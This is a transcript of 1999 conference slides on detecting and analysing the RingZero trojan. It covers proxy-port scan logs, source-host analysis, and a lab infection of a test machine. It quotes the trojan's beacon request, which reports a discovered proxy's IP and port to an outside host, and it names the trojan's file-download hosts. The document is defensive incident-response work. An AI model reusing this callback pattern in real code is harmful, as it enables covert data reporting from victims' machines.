The Hunt for RingZero The Hunt For RingZero John Green [email protected].
-
Upload
darrell-byrd -
Category
Documents
-
view
215 -
download
1
Transcript of The Hunt for RingZero The Hunt For RingZero John Green [email protected].
The Hunt for RingZero
Outline
• A word about Trojans• Getting a clue• Looking for data• How many source hosts?• The hunt for the Trojan• Game over• BoF Findings
The Hunt for RingZero
Deep Throat - 2140
200.31.13.8 > 158.12.110.1.2140: udp 24500 001e e104 0000 7111 8795 ac14 0d08coa8 6e01 ea60 085c 000a fbb7 3030 80800001 0001 0000 0000 0664 6f6e 616c
200.31.13.8 > 158.12.110.2.2140: udp 24500 001e e204 0000 7111 8694 ac14 0d08coa8 6e02 ea60 085c 000a fbb6 3030 00000001 0000 0000 0000 0331 3831 0231
The Hunt for RingZero
Trojans Review
• The most well known trojan programs are Netbus and Back Orifice
• Protective tools include: all major anti-virus tools, nuke nabber, NFR’s Back Officer Friendly and AtGuard
The Hunt for RingZero
Getting A Clue
• Sept 19, 1999 Roland Grefer writes with an AtGuard detect from his home.com cablemodem
• We both commented that probes to tcp port 3128 are not that common
The Hunt for RingZero
More Clues
• Sept 21, 1999 - SHADOW analyst Adena Bushrod reports similar activity
• Contact other organizations:MITRE, ARL
• They see it too!
The Hunt for RingZero
Proxy Scanning
08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)
The Hunt for RingZero
How Big Is This Thing?!
Intrusion detection systems ranging from home computers with cable modems to high end government facilities have been reporting a large number of probes to TCP port 3128, the squid proxy service. If your site has a network monitoring capability and you DO NOT run squid and you detect this pattern over the next two weeks, please let us know by sending email to [email protected] with intrusion 3128 in the subject line. If you are allowed to send the data trace, please sanitize any of your site's network information (destination host address) and send the data trace as well. Thank you!
BIG!
The Hunt for RingZero
Over 300 3128 MessagesIn Three Days
29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25;30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25;31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48;32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25;33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25;34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48;35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48;36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25;37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy139.66;3128;2678;48;48;38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48;39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48;40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25;
Over 1000 Source Hosts!
The Hunt for RingZero
What Are The Possibilities?> 1000 Source Hosts
• Spoofed• Worlds largest coordinated
attack• Trojan software or “malware”
The Hunt for RingZero
Source Host Analysis
“I am almost certain that these are indeed live, non-spoofedhosts. First, I've dumped the tcpdump traffic with the arrivingTTL values. I've done about a dozen traceroutes back to thesource IP's and the hop counts are believably close. Also, other clues found in the tcpdump output itself appear topoint to different hosts or a very wise crafter. “
Judy Novak - ARL
The Hunt for RingZero
The First Hot Tip - Sept 23
get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst mode = writeip&pst host=192.168.2.1&pstport=3128
“We began receiving probes to 3128 on Wednesday, September 15th.The probes come in a triplet - first to TCP port 80, then 8080,then 3128. The probes appear to be going after random addresses.One finally hit a web server listening on port 80 so I got to seewhat it was doing. It sent the following request to the server:”
Anonymous
Later verified by four other sources.
The Hunt for RingZero
So What?
“Just a couple additional pieces of information. I only probed backin a rather simple way about 5 machines and found none of thoserunning finger, SMTP or FTP, though all were running TCP port 139,so I concluded (with a very small sample size) it was a Windowsattack of some kind, though I admit this is a guess based onsketchy information.”
Anonymous
The Hunt for RingZero
Game Over?
“I am the Network Security Officer at Vanderbilt University. I have a system that was infected with a trojan called RingZero and was scanningfor ports 80, 8080, and 3128. I have pieces of the code specifically afile called its.exe and a file that was Ring0.vxd. I am still trying to find the original infected file and I suspect that it was a screen saver. If you would like more info give me a call.”
Ron Marcum, Vanderbilt
The Hunt for RingZero
Basic Game Plan
• Move the Vanderbilt files to a “safe” platform for examination
• Use strings and other unix utilities to examine the files
• Targeting mechanism was a primary interest
The Hunt for RingZero
Hour 1 - Gameplan Deviation
• Strings, etc didn’t get us too far
• RingZero uses Ian Luck’s “Petite” program to compress the executables
• Tim White volunteers to sacrifice his windows laptop
The Hunt for RingZero
Hour 2 - Deliberate Infection
• Created a mini-network
• 2 computers, both running sniffers
• Unzipped the archive
• Two files: its.exe, pst.exe– it was a “coin-toss”
The Hunt for RingZero
Hour 3 - Examining ITS.EXE
• Ran its.exe– removed itself from the desktop– its.exe and Ring0.xvd placed in \
windows\system directory– created an empty its.dat file
• No network activity….. :(
The Hunt for RingZero
Traffic At Last!
• After rebooting, the infected machine started doing DNS queries for hosts named:
phzforum.virtualave.netxoom.members.com
Now we’re getting somewhere!
The Hunt for RingZero
So What Now?
• Created an entry in the infected machine’s hosts file– Gave it the ip address of the sniffer
• Infected machine started sending web requests on port 80
The Hunt for RingZero
Hours 4 and 5 - Reconfiguring the Sniffer
Machine• Switched to Linux• Ran Apache and tcpdump• Apache logs showed that its.exe
was trying to retrieve an its.dat file from the webservers– phzforum.virtualave.net/its.dat– xoom.members.com/harmer/its.dat
The Hunt for RingZero
What Should Be In ITS.DAT?
• its.dat no longer existed on phzforum.virtualave.net
• Terminal room closed before we discovered the xoom.members.com connection
• its.dat was found the following morning, but it is encrypted?
The Hunt for RingZero
Party Over? - Nope!
• Getting very late• Oak Room closed• Remaining BoF members
relocated to a corner, downstairs in LaSalle’s
The Hunt for RingZero
Hours 6 and 7 Running The PST.EXE File
• Ran PST.EXE• Initial behavior was the same
as the its.exe– relocated itself, etc.
PST.EXE spewed packets to ports 80, 8080, and 3128!
The Hunt for RingZero
PST.EXE Behavior
• Generated a small list of “random?” IP addresses
• Scanned all IPs for port 80, then 8080, and finally 3128
• Repeated
The Hunt for RingZero
What Is It Doing Though?
• Since the scan was sequential, we were able to configure apache “on-the-fly” to answer web requests for IPs in the scan.
• Examining the Apache logs showed what we had hoped for:
The Hunt for RingZero
The End Game
get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst mode = writeip&pst host=192.168.2.1&pstport=3128
The proxy is being used to send its own IP address and proxy port
home to the “mothership” !
The Hunt for RingZero
Review of Findings
• ITS.EXE attempts to retrieve files from various webservers
• PST.EXE is the active scanner– doesn’t require the its.dat file to run– discovered proxies send their IPs to
www.rusftpsearch.net
The Hunt for RingZero
Questions Still Remain
• Infection mechanism?
• How does it start at boot time?
• What is the its.dat file for?– Targeting– Scan intensity dial– Attack configuration
The Hunt for RingZero
Implications?
Quantum leap in distributed attack technology
• Viral infection rates• Configurable - its.dat
– scanning -> attacking?
• Automatic result consolidation